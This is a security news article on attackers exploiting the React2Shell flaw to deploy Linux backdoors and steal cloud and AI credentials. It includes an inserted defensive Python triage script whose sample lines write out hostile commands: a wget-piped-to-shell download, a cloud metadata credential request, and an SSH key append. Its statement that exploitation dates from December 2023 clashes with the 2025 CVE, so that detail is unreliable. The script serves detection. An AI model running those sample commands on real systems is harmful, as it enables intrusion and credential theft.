React2Shell Vulnerability Exploited for Linux Malware Attacks

React2Shell Vulnerability Exploited Globally to Deploy Advanced Malware and Steal Cloud Credentials

  • The React2Shell security vulnerability is actively exploited to deploy advanced malware such as KSwapDoor and ZnDoor.
  • KSwapDoor is a stealthy Linux remote access tool using encrypted mesh networking and a “sleeper” mode to avoid firewalls.
  • Multiple threat actor groups, including at least five China-linked ones, utilize React2Shell to deliver various payloads targeting cloud and enterprise systems.
  • Attackers harvest cloud and AI credentials using tools like TruffleHog and Gitleaks to deepen access in compromised environments.
  • Over 111,000 IPs remain vulnerable to React2Shell, with thousands of ongoing exploit attempts worldwide as tracked by security organizations.

A critical security flaw named React2Shell is being exploited by cybercriminals to deliver malware such as the remote access tool KSwapDoor and the backdoor ZnDoor. This exploitation has been ongoing since at least December 2023, with attacks targeting organizations globally, including those in Japan, where ZnDoor has been observed in the wild. Payload delivery often occurs via bash commands that use wget to download and execute malicious code from remote servers.


KSwapDoor operates on Linux systems, creating an encrypted mesh network connecting compromised servers to evade detection and security blocks. Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, explained, “It uses military-grade encryption to hide its communications and features a ‘sleeper’ mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal.” It also impersonates legitimate Linux kernel processes to avoid being flagged.

The React2Shell vulnerability is identified as CVE-2025-55182, carrying the maximum CVSS score of 10.0. Multiple threat actor groups with links to China have weaponized this exploit to deploy diverse payloads, including tunneling utilities (MINOCAT), downloaders (SNOWLIGHT), backdoors (COMPOOD and HISONIC), and remote access trojans such as ANGRYREBEL (also known as Noodle RAT).

Microsoft reported that attackers leverage the vulnerability to execute arbitrary commands, establish reverse shells to Cobalt Strike servers, deploy remote monitoring tools like MeshAgent, alter authorized_keys, and enable root login. The intruders also use Cloudflare Tunnel endpoints to obscure their activities. These attacks involve credential theft targeting cloud service metadata endpoints for platforms like Azure, AWS, Google Cloud Platform, and Tencent Cloud. Tools such as TruffleHog and Gitleaks assist in extracting sensitive secrets including AI service tokens (OpenAI API keys), Kubernetes service accounts, and various cloud-native credentials.
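As an added defender-side example (not code from the article or from any of the vendors it cites), the following Python script triages a host for the post-exploitation behaviour the report lists: wget/curl piped into a shell, requests to cloud metadata endpoints, appends to authorized_keys, and root login enabled in sshd_config. The sample log lines and config are constructed, and the regular expressions are assumptions that a real deployment would tune.

```python
"""Triage checks for the React2Shell post-exploitation behaviour described above.
Added example; sample inputs are constructed, not taken from a real incident."""
import re

# Each rule names one behaviour from the report. Patterns are assumptions.
PATTERNS = {
    "wget_pipe_to_shell": re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b"),
    # AWS/Azure/Tencent link-local endpoint, GCP and Tencent hostnames.
    "cloud_metadata_access": re.compile(
        r"\b169\.254\.169\.254\b|metadata\.google\.internal|metadata\.tencentyun\.com"),
    "authorized_keys_write": re.compile(r"(>>?|\btee\b)[^\n]*\.ssh/authorized_keys"),
}

# Constructed sample lines mirroring a shell history or auditd EXECVE feed.
SAMPLE_LINES = [
    "bash -c 'wget -qO- http://203.0.113.10/x.sh | sh'",
    "curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "echo 'ssh-ed25519 AAAA...constructed' >> /root/.ssh/authorized_keys",
    "ls -la /var/www",
]
# Constructed sshd_config fragment: a commented-out 'no' followed by a live 'yes'.
SAMPLE_SSHD_CONFIG = "# PermitRootLogin no\nPermitRootLogin yes\nPasswordAuthentication no\n"


def scan_lines(lines):
    """Return (line_number, rule_name, line) for every line that matches a rule."""
    hits = []
    for no, line in enumerate(lines, start=1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                hits.append((no, name, line.strip()))
    return hits


def sshd_root_login_enabled(config_text):
    """True if the effective PermitRootLogin directive allows root logins.
    sshd honours the first uncommented occurrence, so stop at the first match."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"PermitRootLogin\s+(\S+)", line, re.IGNORECASE)
        if m:
            return m.group(1).lower() == "yes"
    return False  # absent directive: modern sshd defaults to prohibit-password


if __name__ == "__main__":
    for no, rule, line in scan_lines(SAMPLE_LINES):
        print(f"line {no}: {rule}: {line}")
    print("root login enabled:", sshd_root_login_enabled(SAMPLE_SSHD_CONFIG))
```

Feed it real shell history or auditd output instead of SAMPLE_LINES, and the live /etc/ssh/sshd_config, to use it on a host.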

A campaign known as Operation PCPcat has compromised over 59,000 servers by exploiting React2Shell and other Next.js vulnerabilities, stealing configuration files, SSH keys, cloud credentials, and system data. The malware establishes persistence, deploys SOCKS5 proxies, and creates reverse shells for ongoing control and propagation, showing signs of extensive intelligence-driven data exfiltration.


Current tracking by the Shadowserver Foundation reveals more than 111,000 IP addresses vulnerable to React2Shell, with the highest numbers in the United States, Germany, France, and India. Security telemetry from GreyNoise identifies over 500 malicious IPs actively attempting exploitation in the past 24 hours across the U.S., India, the U.K., Singapore, and the Netherlands.
